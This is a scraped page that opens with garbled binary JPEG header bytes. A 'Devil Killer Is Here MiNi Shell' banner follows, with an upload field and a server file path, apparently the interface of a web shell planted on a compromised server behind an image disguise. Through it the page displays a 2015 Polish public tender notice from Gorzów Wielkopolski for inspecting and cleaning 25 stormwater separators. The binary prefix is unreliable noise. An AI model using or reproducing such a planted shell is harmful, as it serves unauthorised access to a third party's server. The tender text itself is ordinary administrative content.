JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/337464-N-2015.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przeglądy i czyszczenia 25 separatorów na miejskiej sieci kanalizacji deszczowej w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 337464 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.wrota.lubuskie.pl/umgorzow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeglądy i czyszczenia 25 separatorów na miejskiej sieci kanalizacji deszczowej w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na przeglądzie i czyszczeniu 25 separatorów na miejskiej sieci kanalizacji deszczowej w Gorzowie Wlkp.
ZAMÓWIENIE CZĘŚCIOWE NR 1
W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:
a)przeprowadzenia przeglądów zgodnie z poniższym harmonogramem:
- raz w miesiącu (do końca każdego miesiąca)  w zakresie kontroli zanieczyszczeń stałych w komorze wlotowej, grubości warstwy oleju, zwierciadła osadu w osadnikach, w separatorach pływakowych położenia pływaka - ewentualnie jego korekta,
- co dwa tygodnie przegląd pływaka w separatorze nr 14 ul. Wał Okrężny przy przepompowni  na wysokości czerwonego spichlerza oraz w separatorze nr 5 - ul. Kobylogórska
- w przypadku separatora zlokalizowanego przy Cmentarzu Komunalnym ul. Żwirowa - nr 6 przeglądy należy przeprowadzać raz na 3 miesiące.
ZAMÓWIENIE CZĘŚCIOWE NR  2:
W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:
a) wywiezienia i unieszkodliwienia wybranych z separatorów odpadów zgodnie z obowiązującymi przepisami w ramach gruntownego czyszczenia według harmonogramu określonego w SIWZ.
b) podczas czyszczenia separatorów w terminie od 15 września  do 31 października przeprowadzenia kontroli  separatorów zgodnie z art. 62 ust. 1  ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz sporządzenia z jej wyników protokołu.
c) odnotowania każdorazowo wszystkich czynności związanych z zamówieniem w książkach eksploatacji separatorów.
d) informowania pracowników Wydziału Gospodarki Komunalnej i Transportu Publicznego Urzędu Miasta Gorzowa Wlkp. o uszkodzeniach oraz o konieczności i zakresie przeprowadzenia niezbędnych napraw i remontów.
3. Zakres gruntownego czyszczenia , który Wykonawca zobowiązany jest wykonać w ramach przedmiotu zamówienia określonego w § 1 ust. 2 obejmuje wykonanie następujących czynności:
 - opróżnienie całkowicie osadnika,
- oczyszczenie ścian i przewodów osadnika wodą pod ciśnieniem,
- wykonanie inspekcji stanu ścian osadnika,
- opróżnienie całkowicie separatora,
- wyczyszczenie ścian, przewodów oraz pakietów lamelowych lub filtrów koalescencyjnych wraz z ich inspekcją,
- powtórne napełnienie wodą układu,
- wywóz i utylizację powstałych odpadów,
- uporządkowanie terenu wokół separatorów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówień podstawowych, których zakres obejmie przeglądy oraz czyszczenie separatorów na miejskiej sieci kanalizacji deszczowej w mieście Gorzowie Wlkp. zgodnie z Art. 67 ust. 1 pkt 6 stawy  Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMÓWIENIE CZĘŚCIOWE NR 1:  nie wymagane
ZAMÓWIENIE CZĘŚCIOWE NR 2:  2.000 zł (słownie złotych: dwa tysiące)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1 i NR 2
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1
Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
- co najmniej jedną usługę trwającą min. 6 miesięcy i polegającą na przeglądzie min. 10 separatorów.
Wykonawca winien załączyć dowód potwierdzający, że usługa ta została należycie wykonana.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu  zamówień  złożony  na druku stanowiącym Załącznik Nr 4 do SIWZ
ZAMÓWIENIE CZĘŚCIOWE NR 2
Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
- co najmniej jedną usługę  polegającą na czyszczeniu separatorów na kwotę min. 80.000 zł
 Wykonawca winien załączyć dowód potwierdzający, że usługa ta została należycie wykonana.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu  zamówień  złożony  na druku stanowiącym Załącznik Nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ.
ZAMÓWIENIE CZĘŚCIOWE NR 2
Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że dysponuje narzędziami i urządzeniami technicznymi zapewniającymi poprawne wykonanie zamówienia, tj:
- co najmniej 1 samochód próżniowo-ciśnieniowy,
- co najmniej 1 specjalistyczny samochód do przewozu materiałów niebezpiecznych,
dopuszcza się alternatywę 1 pojazd spełniający obie ww. funkcje
- co najmniej 1 agregat wysokociśnieniowy do płukania filtrów koalescencyjnych,
- co najmniej 1 wciągarka filtrów koalescencyjnych,
 (Zamawiający określił niezbędne minimum sprzętu).
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu  narzędziami i urządzeń technicznych złożonego na druku stanowiącym Załącznik Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ.
ZAMÓWIENIE CZĘŚCIOWE NR 2
Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do jego realizacji, a także przedstawi informację o podstawie dysponowania tymi osobami, tj:
- minimum 1 osoba nadzorująca prace, posiadająca uprawnienia w branży sanitarnej bez ograniczeń.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu osób złożonego na druku stanowiącym Załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMÓWIENIE CZĘŚCIOWE NR 1 i NR 2
Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli, Wykonawca wskazał, że polega na zasobach innych podmiotów. 2. Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 3. Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt III.4.3.1) - zastępuje się go dokumentem (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego. Uwaga: Wykaz zamówień wraz z dowodami potwierdzającymi, że usługi zostały wykonane należycie musi obejmować minimum zamówienia spełniąjące warunki udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - TERMIN PŁATNOŚCI - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy: 
Dla ZAMÓWIENIA CZĘŚCIOWEGO NR 1, Nr 2:
Zamawiający dopuszcza zmianę postanowień umowy, w następujących przypadkach:
- w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy,
- okoliczności te odnosić się mogą w szczególności do wystąpienia:
a)nagłych zmian stanu prawnego, zmian przepisów prawa, norm i standardów albo zmian w wiedzy technicznej;
b)konieczności czasowego wstrzymania wykonania Przedmiotu umowy przez Zamawiającego;
c)wystąpienia innych okoliczności niezależnych od Wykonawcy tj.:
- niesprzyjające warunki atmosferyczne, skutkujących niemożliwością dotrzymania terminu realizacji umowy,
- zdarzenia losowe np. powódź, uniemożliwiające wykonanie zamówienia w terminie,
d)likwidacji separatorów lub wyłączenia z użytkowania np. w wyniku prowadzonych prac modernizacyjnych lub przebudowy układów drogowych lub awarii urządzeń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wrota.lubuskie.pl/umgorzow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul.Sikorskiego 3-4, 66-400 Gorzów Wlkp. pok.315..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 12:30, miejsce: Urząd Miasta Gorzowa Wlkp. 66-400 Gorzów Wlkp. ul. Myśliborska 34, Kancelaria Ogólna (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeglądy 25 separatorów na miejskiej sieci kanalizacji deszczowej w Gorzowie Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres czynności związanych z przeprowadzeniem kontroli w poszczególnych częściach separatorów obejmuje:
1. pływak:
- sprawdzenie zanurzenia pływaka. Pływak powinien wystawać nad powierzchnię. Całkowite zanurzenie może świadczyć o jego zanieczyszczeniu, nieszczelności lub nagromadzeniu na powierzchni substancji ropopochodnych.
W przypadku , gdy jako przyczyna wyeliminowana zostanie nadmierna ilość substancji ropopochodnych należy:
- wyjąć pływak,
- umyć strumieniem wody,
- sprawdzić czy nie ma uszkodzeń mechanicznych
- zainstalować pływak w prowadzeniu (tylko przy wypełnionym separatorze)
2. osadnik:
- usunięcie dużych zanieczyszczeń jak worki, butelki, styropian
- zmierzenie przy użyciu miarki wyposażonej w talerzyk oporowy  ilość osadu.
3. część separacyjna lub magazynująca substancje ropopochodne:
- wykonanie pomiaru za pomocą tyki pomiarowej posmarowanej środkiem reagującym z wodą lub przezroczystą rurką. grubości warstwy substancji ropopochodnych,
b) usuwania na bieżąco zgromadzonych w separatorach, osadnikach, w komorach wlotowych i wylotowych oraz w obejściach awaryjnych  liście, gałęzie, śmieci itp.,
c) wykonania badań jakości oczyszczonych ścieków w każdym roku zgodnie z obowiązującymi przepisami prawa - wg poniższych terminów:
- od 1 maja do 30 maja
- od 1 listopada do 30 listopada
Badanie należy przeprowadzić w akredytowanym laboratorium,
W badaniu należy określić wskaźniki - zawartość zawiesin ogólnych oraz węglowodorów ropopochodnych,
d) zakupienie 4 razy w ciągu roku kart doładowujących i doładowanie konto w urządzeniu PRONAL separatora w ul. Szpitalnej nr 4 przedłużające o min. 3 miesiące możliwość wysyłania SMS. Pierwszą kartę doładowującą należy kupić w terminie wskazanym przez Zamawiającego,
e) wykoszenia roślinności w okresie wegetacyjnym tj. od maja do października, aby wysokość porostu nie przekraczała  25 cm pasami:
- separator nr 23 Kujawska przy separatorze pasem 1,5mx2m oraz skarpę przy wylocie 8 mx3m
- separator nr 24 Szmaragdowa przy zbiorniku retencyjnym  pasem 14 m x3m
- separator nr 19 Sulęcińska przy separatorze pasem 17mx5m
f) prowadzenie książki eksploatacji dla każdego separatora -  książki dostarczy Zamawiający,
g) odnotowanie każdorazowo wszystkich ww. czynności związane z przedmiotem zamówienia w książkach eksploatacji separatorów.
h) informowania pracowników Wydziału Gospodarki Komunalnej i Transportu Publicznego Urzędu Miasta Gorzowa Wlkp. o uszkodzeniach oraz o konieczności i zakresie przeprowadzenia   niezbędnych napraw i remontów.
3. Przeglądy w ramach przedmiotu zamówienia należy przeprowadzać zgodnie z przepisami BHP i PPOŻ., nie dopuszcza wykonania przez 1 pracownika.
4. Zamawiający wymaga pisemnej informacji o terminie przeglądu i osobach wyznaczonych do jego wykonania co najmniej na 3 dni przed planowanym wykonaniem usługi.
5. Przegląd za miesiąc grudzień należy wykonać w terminie do 20 grudnia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. TERMIN PŁATNOŚCI - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Czyszczenie 25 separatorów na miejskiej sieci kanalizacji deszczowej w Gorzowie Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:
a) wywiezienia i unieszkodliwienia wybranych z separatorów odpadów zgodnie z obowiązującymi przepisami w ramach gruntownego czyszczenia według poniższego harmonogramu:
 - 1 raz w roku tj. w terminie od 15 września do 31 października : 
1. dwa separatory lamelowe - ul. Górczyńska - nr 16 i 17,
2. separator - ul. Roosvelta - nr 18
3. separator lamelowy - ul. Fabryczna - nr 22,
4. separator - ul. Kwiatowa - nr 25,
5. separator -ul . Strażacka - nr 27
6. separator - ul. Wyszyńskiego - Dekerta - nr 28,
- 2 razy w roku tj. pierwszy raz w terminie: w kwiecień - maj oraz drugi raz w terminie od 15 września do 31 października:
1. Separator lamelowy - ul. Wał Okrężny - nr 1,
2. Dwa separatory lamelowe - ul. Bierzarina - nr 2 i 3,
3. Separator lamelowy - ul. Szpitalna - nr 4,
4. Separator lamelowy - ul. Kobylogórska - nr 5
5. Separator - ul. Żwirowa - nr 6
6. Separator koalescencyjny- ul. Kasprzaka - nr 12,
7. Separator lamelowy - ul. Błotna - nr 13,
8. separator lamelowy - ul. Wał Okrężny przy budynku czerwonego spichlerza -  nr 14
9. separator - ul. E.Platter - nr 15
10. Separator koalescencyjny - ul. Sulęcińska - nr 19,
11. Separator koalescencyjny - ul. Korsaka - nr 20,
12. Separator - ul. Kujawska - nr 23,
13. Separator - przy zbiorniku retencyjnym ul. Szmaragowa - nr 24
14. Separator- ul. Fabryczna oznaczony nr 26,
